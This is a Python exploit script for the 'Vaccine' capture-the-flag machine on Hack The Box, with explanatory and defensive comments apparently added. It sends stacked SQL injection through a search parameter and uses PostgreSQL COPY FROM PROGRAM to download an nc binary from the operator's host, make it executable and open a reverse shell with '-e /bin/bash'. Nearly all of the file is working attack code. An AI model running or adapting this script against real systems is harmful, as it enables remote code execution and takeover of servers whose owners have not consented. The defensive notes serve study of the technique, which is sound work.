1import requests
2import random
3
4
# Operator-supplied settings. Every value below is a placeholder and is
# substituted verbatim into the SQL/shell strings built further down, so
# none of them is validated or quoted here.
# your_cookie: an already-authenticated PHPSESSID for the target web app
# (the injection point sits behind a login, hence the session cookie).
# your_IP / your_web_port: where the target's database host will fetch the
# nc binary from, and where it will connect back to.
your_cookie="<SESSION_COOKIE>" #CHANGE ME !
your_IP="<YOUR_IP>" #CHANGE ME !
your_web_port="80" #CHANGE ME !
your_nc_port_listener="4444" #CHANGE ME !
your_nc_PATH="nc" #CHANGE ME ! --> The path to the nc executable inside your web server
10
11'''
12Author: Florianges
13This script exploits the SQL injection in the Vaccine CTF on HTB
14This script sends an nc executable to the server and runs it to generate a reverse shell
15You must start a web server to host the nc executable --> example: sudo python -m SimpleHTTPServer 80
16And you must run an nc listener --> example: nc -lvp 4444
17Then you can execute this script with python3
18Note: The nc executable hosted on your web server must be GNU nc (and therefore must not be the OpenBSD nc)
19'''
20
21
# Random suffix for the scratch table and the /tmp directory, so that a
# re-run does not collide with leftovers from an earlier attempt.
22nb_random = str(random.randint(1,100000))
# Index into `cmd`; the loop below sends one statement per request.
23i=0
24
# Stacked SQL statements that are appended after the injected search term.
# The first two create a throwaway table; the last three abuse PostgreSQL's
# COPY ... FROM PROGRAM, which runs the quoted string through the database
# server's shell. That feature is only available to superusers (or members
# of pg_execute_server_program), so the impact here depends on the web app
# connecting to the database with an over-privileged role.
# Defensive notes: a parameterized query and a least-privilege DB role both
# close this path; on the detection side, COPY FROM PROGRAM in the postgres
# log, an outbound wget from the database host, and a new executable under
# /tmp owned by the postgres user are each a strong signal.
25cmd = ['DROP TABLE IF EXISTS cmd_'+nb_random,
26 'CREATE TABLE cmd_'+ nb_random +'(cmd_output text)',
27 'COPY cmd_'+ nb_random +' FROM PROGRAM \'wget -P /tmp/'+ nb_random +' http://'+ your_IP +':'+ your_web_port +'/'+ your_nc_PATH + '\'',
28 'COPY cmd_'+ nb_random +' FROM PROGRAM \'chmod 777 /tmp/'+ nb_random +'/nc\'',
29 'COPY cmd_'+ nb_random +' FROM PROGRAM \'/tmp/' + nb_random +'/nc '+ your_IP +' ' + your_nc_port_listener +' -e /bin/bash\'']
30
# Send each statement as its own GET to the search parameter. The target
# host is hard-coded; only the cookie, ports and IP above are configurable.
31while (i<=len(cmd)-1):
# `a';` closes the original string and statement, `; -- -` comments out
# whatever the application appends after the search term. The full SQL
# therefore appears in clear text in the web server's access log.
32 url = "http://10.10.10.46/dashboard.php?search=a';"+ cmd[i] +"; -- -"
33 cookies = {'PHPSESSID': your_cookie}
34 print("Payload --> " + url)
# NOTE(review): this message is printed before the final request below is
# actually issued; the order of the print and the requests.get is unchanged.
35 if(i==4):
36 print("All the payload is send, check your nc processus")
37 print("You can spawn tty with this command: SHELL=/bin/bash script -q /dev/null")
# The response body is bound to `page` but never inspected, so a failed
# statement (e.g. a permission error on COPY) goes unnoticed here.
38 page = requests.get(url,cookies=cookies)
39 i=i+1